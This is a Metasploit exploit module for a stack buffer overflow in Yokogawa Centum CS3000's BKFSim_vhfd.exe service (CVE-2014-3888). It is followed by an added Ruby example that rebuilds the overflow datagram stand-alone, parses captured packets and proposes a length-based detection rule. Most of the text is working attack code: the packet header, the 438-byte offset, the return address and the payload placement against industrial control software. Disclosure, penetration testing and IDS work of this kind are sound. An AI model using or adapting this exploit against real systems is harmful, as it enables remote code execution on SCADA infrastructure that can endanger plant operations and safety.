GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow on Yokogawa CS3000. The vulnerability
        exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create
        logs using functions like vsprintf and memcpy in an insecure way. This module has been
        tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.
      },
      'Author'         =>
        [
          'Redsadic <julian.vilas[at]gmail.com>',
          'juan vazquez'
        ],
      'References'     =>
        [
          ['CVE', '2014-3888'],
          ['URL', 'http://jvn.jp/vu/JVNVU95045914/index.html'],
          ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf'],
          ['URL', 'https://www.rapid7.com/blog/post/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow']
        ],
      'Payload'        =>
        {
          'Space'           => 1770, # 2228 (max packet length) - 16 (header) - 438 (target['Offset']) - 4 (ret)
          'DisableNops'     => true,
          'BadChars'        => "\x00",
          'PrependEncoder'  => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3',
            {
              'Ret'    => 0x61e55c9c, # push esp | ret # LibBKCCommon.dll
              'Offset' => 438
            }
          ],
        ],
      'DisclosureDate' => '2014-05-23',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(20010)
      ])
  end

  def exploit
    connect_udp

    sploit = "\x45\x54\x56\x48\x01\x01\x10\x09\x00\x00\x00\x01\x00\x00\x00\x44" # header
    sploit << rand_text(target['Offset'])
    sploit << [target.ret].pack("V")
    sploit << payload.encoded

    print_status("Trying target #{target.name}, sending #{sploit.length} bytes...")
    udp_sock.put(sploit)

    disconnect_udp
  end
end
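The datagram built in `exploit` is laid out as a fixed 16-byte header, `target['Offset']` (438) filler bytes, the 4-byte `push esp | ret` address in little-endian order, and then the encoded payload; the `Space` value of 1770 is what remains of the 2228-byte maximum after those parts. The Ruby below is an added example, not part of the Metasploit module or of the framework: it rebuilds that layout stand-alone, splits such a datagram back into its fields so the return-address overwrite can be inspected from a capture, and applies a length heuristic a detection engineer might turn into an IDS rule. The header bytes, offset, maximum length, return address and bad-character list are taken from the module; the fixed filler byte (the module uses `rand_text`), the 16-byte stand-in payload, and the assumption that legitimate BKFSim_vhfd traffic never reaches the 16 + 438 byte mark are mine.

```ruby
# Added example; mirrors the packet layout of the module above but is not its code.
MAX_PACKET    = 2228
HEADER        = "\x45\x54\x56\x48\x01\x01\x10\x09\x00\x00\x00\x01\x00\x00\x00\x44".b
RET_OFFSET    = 438
RET_ADDR      = 0x61e55c9c                # push esp | ret in LibBKCCommon.dll (from the module)
BAD_CHARS     = "\x00".b
DEFAULT_RPORT = 20010
PAYLOAD_SPACE = MAX_PACKET - HEADER.bytesize - RET_OFFSET - 4   # 1770, as in the module

# Build the datagram exactly as the module lays it out:
#   header | RET_OFFSET filler bytes | ret (little-endian) | payload
# Raises ArgumentError if the payload would not fit within MAX_PACKET or if the
# return address or payload contains a bad character.
def build_overflow_datagram(payload, filler: "A")
  payload = payload.b
  if payload.bytesize > PAYLOAD_SPACE
    raise ArgumentError, "payload too large (#{payload.bytesize} > #{PAYLOAD_SPACE})"
  end
  ret = [RET_ADDR].pack("V")
  [ret, payload].each do |part|
    BAD_CHARS.each_byte do |bc|
      raise ArgumentError, format("bad char 0x%02x present", bc) if part.bytes.include?(bc)
    end
  end
  fill = (filler.b * RET_OFFSET).byteslice(0, RET_OFFSET)   # fixed filler, constructed stand-in for rand_text
  HEADER + fill + ret + payload
end

# Split a datagram back into the fields the module writes. Returns nil when the
# datagram is too short to reach the saved return address.
def parse_overflow_datagram(data)
  data = data.b
  ret_at = HEADER.bytesize + RET_OFFSET
  return nil if data.bytesize < ret_at + 4
  {
    header:  data.byteslice(0, HEADER.bytesize),
    ret:     data.byteslice(ret_at, 4).unpack1("V"),
    payload: data.byteslice((ret_at + 4)..-1)
  }
end

# Detection heuristic: a datagram to the service port that starts with the same
# four bytes as the module's header ("ETVH") and is long enough to overwrite the
# saved return address. Assumption (not stated on the page): benign traffic to
# BKFSim_vhfd.exe stays well below HEADER.bytesize + RET_OFFSET bytes.
def suspicious_bkfsim_datagram?(dst_port, data)
  data = data.b
  dst_port == DEFAULT_RPORT &&
    data.byteslice(0, 4) == HEADER.byteslice(0, 4) &&
    data.bytesize > HEADER.bytesize + RET_OFFSET
end

if __FILE__ == $PROGRAM_NAME
  pkt = build_overflow_datagram("\xcc".b * 16)   # constructed stand-in payload (int3 sled)
  fields = parse_overflow_datagram(pkt)
  printf("datagram %d bytes, ret=0x%08x, payload %d bytes, suspicious=%s\n",
         pkt.bytesize, fields[:ret], fields[:payload].bytesize,
         suspicious_bkfsim_datagram?(DEFAULT_RPORT, pkt))
end
```

The bad-character check on the return address is the reason `0x61e55c9c` works where a gadget containing a zero byte would not: the address is copied through string-handling code, so a `\x00` would truncate the overwrite before the payload. The length heuristic deliberately keys on the offset rather than on the header alone, because the header bytes are presumably also present in legitimate requests.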